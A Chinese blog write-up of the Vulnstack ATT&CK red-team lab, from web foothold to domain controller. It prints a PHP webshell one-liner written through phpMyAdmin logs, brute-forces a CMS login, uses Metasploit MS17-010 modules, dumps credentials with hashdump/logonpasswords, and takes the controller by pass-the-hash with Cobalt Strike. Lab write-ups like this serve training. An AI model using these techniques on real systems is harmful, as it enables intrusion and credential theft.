ATT&CK红队评估实战靶场(1)思路

最新推荐文章于 2024-08-03 11:16:05 发布
最新推荐文章于 2024-08-03 11:16:05 发布
阅读量2.4k 收藏 3
点赞数 1
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrHatSec/article/details/124294590
版权

ATT&CK红队评估实战靶场(1)思路

靶场链接

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

一、环境说明

1.1 拓扑结构

在这里插入图片描述

1.2 靶机环境

靶机环境:

Win7:

外网IP:172.16.27.163
内网IP:192.168.52.143
PassWD:hongrisec@2020

Win2003:

IP:192.168.52.141
PassWD:hongrisec@2020

Win2008:

IP:192.168.52.138
PassWD:hongrisec@2021

攻击机:

Macos:172.16.27.1
KaliLinux:172.16.27.138

1.3 环境启动

启动Win7下的 PHPStudy 开启Web服务

PHPStudy 安装路径:C:\phpStudy

在这里插入图片描述

二、信息收集

2.1 探测存活主机IP

利用 Nmap 扫描172.16.27.1/24这个段存活的IP主机

nmap -sP 172.16.27.1/24

在这里插入图片描述
发现存活主机:172.16.27.163

2.2 端口扫描

已知 172.16.27.163 这个IP为我们的目标 IP,接下来我们进行端口扫描看一下这个 IP 上开了哪些服务

nmap -sC -sV -Pn -p 1-65535 172.16.27.163

-sC:等价于 --script=default,使用默认类别的脚本进行扫描。

-sV:指定让Nmap进行版本侦测

-Pn:将所有指定的主机视作开启的,跳过主机发现的过程

-p:指定端口

在这里插入图片描述

2.3 目录扫描

通过扫描 IP 端口发现 80 端口为 Open 状态,打开发现为默认页面 Hello Word

在这里插入图片描述
使用 dirsearch 进行目录扫描

在这里插入图片描述

三、漏洞利用

3.1 Phpmyadmin后台Getshell

在目录扫描阶段发现根目录有 Phpmyadmin 目录,打开尝试弱口令登陆 root/root,可以成功登陆后台

在这里插入图片描述
尝试利用全局日志来 getshel

在这里插入图片描述
修改 general log 为 ON 状态

修改 general log file 地址为网站根目录 C:\phpStudy\PHPTutorial\WWW\shell.php

写入一句话到 shell.php 文件

执行 Sql 语句 SELECT '<?php eval($_POST["cmd"]);?>'

在这里插入图片描述

使用蚁剑进行连接 Webshell

在这里插入图片描述

3.2 yxcms后台拿shell

通过目录扫描发现网站根目录还有一个 yxcms 目录,打开发现网站使用的是 yxcms 模板

百度搜索此模板,发现后台地址为 index.php?r=admin/index/login
在这里插入图片描述
经过尝试弱口令发现验证码可以重复利用,那我们使用burp来爆破一下后台密码

在这里插入图片描述

爆破成功,密码为 123456,尝试登陆后台

在这里插入图片描述

在前台模板处添加模板写入webshell

在这里插入图片描述

默认地址为 http://172.16.27.163/yxcms/protected/apps/default/view/default/shellx.php

在这里插入图片描述

3.3 ms17-010

在前面进行端口扫描的时候我们发现这此 IP 开放了 135、455高危端口,扫描一下看是否存在 MS17-010 漏洞

在这里插入图片描述
使用 MSF 来进行利用

在这里插入图片描述
use exploit/windows/smb/ms17_010_eternalblue

set rhosts 172.16.27.163

在这里插入图片描述
成功利用

在这里插入图片描述

四、内网渗透

4.1 Cobalt Strike上线

启动服务端 sudo ./teamserver 172.16.27.138 password

在这里插入图片描述
本地启动客户端进行连接

在这里插入图片描述

生成木马文件

在这里插入图片描述
并上传到网站根目录

在这里插入图片描述
等待 CS 上线

在这里插入图片描述

4.2 内网信息收集

查看网关:shell ipconfig/all

在这里插入图片描述
在这里插入图片描述
发现内网IP地址:

外网IP:172.16.27.163
内网IP:192.168.52.143

查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域 shell net config Workstation

在这里插入图片描述
查看局域网内所有计算机 shell net view

在这里插入图片描述
可以看到除了Web这台主机外还有两台主机,主机名分别为:OWA、ROOT-TVI862UBEH

查看系统信息:shell systeminfo

在这里插入图片描述
可以进一步确定当前域是 god.org 并且域服务器的计算机名是 OWA

4.3 主机密码收集

获取hash:hashdump

在这里插入图片描述
获取明文密码:logonpasswords

在这里插入图片描述

4.5 Ladon扫描内网存活PC

使用 CS 插件 Ladon 进行内网主机探测扫描 Ladon 192.168.52.1/24 OnlinePC

在这里插入图片描述
内网中还存活着两台主机分别是

域控:192.168.52.138 OWA

域成员:192.168.52.141 ROOT-TVI862UBEH

4.4 提权

将当前用户的权限提升至 system 权限

在这里插入图片描述
等待提权成功上线 CS

在这里插入图片描述

五、横向移动

5.1 Cobalt Strike联动 MSF

新建一个 CS 监听器

在这里插入图片描述
然后运行 MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http

在这里插入图片描述
设置参数

在这里插入图片描述
在 CS 上右键目标选择增加会话

在这里插入图片描述

选择刚新增的监听器

在这里插入图片描述
静等 MSF 上线

在这里插入图片描述

5.2 内网主机端口扫描

获取安装软件信息:run post/winmdows/gather/enum_applications

在这里插入图片描述
发现当前主机(Win7)安装了Nmap

直接利用这台主机上的工具来进行内网主机的端口扫描

shell nmap -Pn -sT -p 1-1000 192.168.52.141

-Pn:将所有指定的主机视作开启的,跳过主机发现的过程
-sT:TCP扫描
-p:指定端口

192.168.52.141 主机端口

在这里插入图片描述
192.168.52.138 主机端口

在这里插入图片描述

5.3 内网主机漏洞探测

使用 nmap 进行主机漏洞扫描,查看是否存在一些常见的漏洞

shell nmap --script=vuln 192.168.52.141
192.168.52.141 漏洞探测情况:
在这里插入图片描述
存在ms08-067、ms17-010 漏洞

shell nmap --script=vuln 192.168.52.138
192.168.52.138 漏洞探测情况:
在这里插入图片描述
存在 ms17-010

5.4 漏洞利用

查看当前网段 run get_local_subnets

在这里插入图片描述
添加路由 run autoroute -s 192.168.52.0/24

在这里插入图片描述
设置代理 use auxiliary/server/socks_proxy

在这里插入图片描述

5.4.1 ms17-010漏洞利用

使用 MSF 模块
exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp

在这里插入图片描述
设置参数 set rhosts 192.168.52.141

在这里插入图片描述

利用成功

在这里插入图片描述
域控那台主机可能因为防火墙限制无法正常利用 ms17-010 漏洞

5.5 PTH获取域控权限

Pass-The-Hash 内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

Pass The Hash原理:

  • 在Windows系统中,通常会使用NTLM身份认证
  • NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser)
  • hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash
  • 如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)

新建一个监听器

在这里插入图片描述
点击探测到的域控主机执行Jump > psexec

在这里插入图片描述
选择刚刚新建的监听器

在这里插入图片描述
点击开始之后等会就可以收到域控主机的 shell

在这里插入图片描述

成功拿下域控服务器

获取一下域控服务器明文密码 logonpasswords

在这里插入图片描述
Ps:Win2003那台机器也可以使用这个方法来获取 Shell

最后截图
在这里插入图片描述
在这里插入图片描述

MrHatSec
关注
专栏目录
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 267
ATT&CK红队评估(红日靶场二)
ATT&CK红队评估实战靶场(一) 练习
qq_31065143的博客
07-24 484
ATT&CK红队评估实战靶场(一) 练习 前言 已经一个月没有写东西啦,因为期末考试加上自己的项目还有考完还有学校的课程内容一直蛮忙的,一直到16号才放假,上个星期还去安恒实习了,就打算乘着双休搭建一个靶机,想学内网好久了,一直都没有上手操作,这边实际上操作一遍,但是下面的内容还是很蠢的也没有什么值得学习的操作,纯粹是我第一次上手进行内网学习的记录。 开始 首先使用nmap进行扫描,使用的命令如下: nmap -sP 192.168.1.0/24 对192.168.1.0网段进行扫描使用的参数说
ATT&CK实战系列-红队评估 (一)Vulnstack三层网络域渗透
最新发布
lizhiiiii的博客
08-03 1150
Vulnstack红日内网域渗透靶场1实战
ATK&CK红队评估实战靶场(一)
mingyqf的博客
01-31 2051
ATK&CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程 回到顶部 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。 回到顶部 0x02 环境搭建 本次环境搭建和靶机默认有些区别,我是在一台服务器的虚拟机上搭建的,服务器.
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 4457
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
ATT&CK红队评估实战靶场(一)
m0_58177121的博客
08-21 614
描述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&amp;CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec<span class="label label-primary">@2019</span>: 一、环境搭建 1.环境搭建测试 2.信息收集
红日靶场-ATT&CK实战系列-红队评估(一)
m0_66638011的博客
06-21 1172
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2873
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5620
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1714
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
ATK&CK1红队评估实战靶场Vulnstack之第三篇CS内网域控
千寻的博客
07-21 753
文章目录蚁剑成功连接shellCS生成shell蚁剑执行CS的shell,进行联动CS进行嗅探CS查看文件CS获取HashCS查看域环境CS获取域内主机列表CS获取域内主机win2008CS获取域内主机win2003最终获取的域内主机信息摘抄 蚁剑成功连接shell CS生成shell attack-->web DRIVE-BY -->scripted web delivery 蚁剑执行CS的shell,进行联动 CS进行嗅探 sleep 0 shell systeminfo #发现
ATT&CK实战系列-红队评估(一)
v2ish1yan的博客
02-26 886
这个靶场的流程,就是外网渗透拿到主机shell扫描内网存活主机,并查看是否存在历史漏洞使用内网代理和路由转发来对内网主机进行攻击应该还有很多思路,这个是比较简单的靶场,继续加油。
ATT&CK红队评估(一)
qq_52579508的博客
06-19 1126
ATT&CK红队评估(一)
ATT&CK红队评估实战靶场(一)
Blazing-Angel的博客
05-16 681
写在前面的话 第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩) 靶场地址:vulunstack 靶场搭建 Win7:密码: cys121` 外网192.168.47.132 内网 192.168.52.143 Win2008 密码:cys121` 内网 192.168.52.138 Win2003 密码:cys121` 内网 192.168.52.141 经过互相ping 内网三台机器可以互相ping通 Kali 外网 192.168.
ATT&CK实战系列-红队评估(一)
weixin_51801534的博客
12-22 2488
1.信息收集 ┌──(root????kali)-[~/桌面] └─# nmap -Pn -A -T4 192.168.1.100 2.指纹信息 3.┌──(root????kali)-[~/桌面] └─# nmap --script=vuln,auth 192.168.1.100 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 4.目录扫描 5.访问探针进行信息收集 6.看到上面扫描的有phpmyadmin,访问phpmyadmin ...
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
Aluxian_的博客
10-22 1198
开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。ATK&CK1红队评估实战靶场Vulnstack(三)
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1464
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1417
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
ATT\\\\&CK红队评估实战靶场
08-16
ATT&CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK红队评估(红日靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值